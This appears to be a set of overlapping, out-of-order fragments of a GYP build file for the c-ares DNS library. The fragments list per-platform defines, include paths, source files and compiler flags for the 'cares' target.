"in \"win android\"', { 'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs':",
"'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c',",
"'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines':",
"'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs':",
"[ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }], [",
"'config/aix/ares_config.h' ], 'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', {",
"'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ] } }] ] } ] }",
"'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] },",
"'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ] },",
"'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [",
"'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c',",
"}, 'targets': [ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ],",
"'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] }, {",
"'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c',",
"'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c',",
"'-liphlpapi.lib' ], }, { # Not Windows i.e. POSIX 'cflags': [ '-g', '-pedantic',",
"or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }], [",
"'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c',",
"'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources':",
"'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c',",
"[ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs': [",
"[ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ]",
"}, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1',",
"{ 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs':",
"] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c',",
"'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }],",
"OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"',",
"}, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h',",
"'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [ # Support for",
"'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h',",
"'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c',",
"'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ],",
"'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ] }, 'sources': [ 'include/ares.h',",
"'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB'",
"'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c',",
"], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib'",
"'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\"",
"malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ]",
"'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h',",
"'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c',",
"{ 'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [",
"] }], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ]",
"[ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs': [",
"'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c',",
"'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c',",
"'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h',",
"'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c',",
"{ 'defines': [ 'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [",
"['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', {",
"[ '-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not Windows i.e. POSIX 'cflags': [",
"'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin'",
"{ 'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', {",
"[ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': {",
"[ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets': [ { 'target_name': 'cares', 'type':",
"for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }]",
"'__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets': [ { 'target_name': 'cares', 'type': '<(library)',",
"<gh_stars>0 { 'target_defaults': { 'conditions': [ ['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64',",
"'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c',",
"'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ]",
"'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ],",
"'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c',",
"'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"',",
"], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ] }",
"], }, { # Not Windows i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall',",
"'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }],",
"}], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }],",
"'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"',",
"[ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': {",
"'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos'",
"'_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h'",
"'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd'",
"], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h',",
"[ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources': [",
"'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources':",
"] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources': [",
"[ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [",
"'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"',",
"'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources':",
"{ 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets': [ { 'target_name':",
"'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [ #",
"android\"', { 'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux'",
"'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs':",
"'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c',",
"'_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources':",
"}], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines':",
"'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not Windows",
"'targets': [ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings':",
"'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ],",
"[ 'config/aix/ares_config.h' ], 'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"',",
"'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c',",
"], 'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS not in \"win android\"', {",
"'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c',",
"{ 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h',",
"'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib',",
"'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs':",
"'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h'",
"'_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] },",
"'_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ],",
"'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ] } }] ] }",
"'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c',",
"'_XOPEN_SOURCE=500' ] }] ] }, 'targets': [ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs':",
"Not Windows i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines':",
"[ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources': [",
"'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, { #",
"], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not Windows i.e. POSIX",
"'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket',",
"}, { # Not Windows i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra',",
"'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions':",
"'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h',",
"'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c',",
"'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c',",
"'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c',",
"'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h',",
"'HAVE_CONFIG_H' ], }], [ 'OS not in \"win android\"', { 'cflags': [ '--std=gnu89'",
"'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources':",
"{ 'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', {",
"'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h'",
"i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H'",
"'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [",
"'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', {",
"[ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }], [",
"[ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c',",
"'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', { 'defines':",
"{ 'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [ # Support",
"[ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix'",
"], 'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ],",
"'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c',",
"'sources': [ 'config/aix/ares_config.h' ], 'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }],",
"[ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__',",
"'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c',",
"], 'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ],",
"'-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS",
"], 'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ],",
"'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets': [ { 'target_name': 'cares',",
"# Not Windows i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ],",
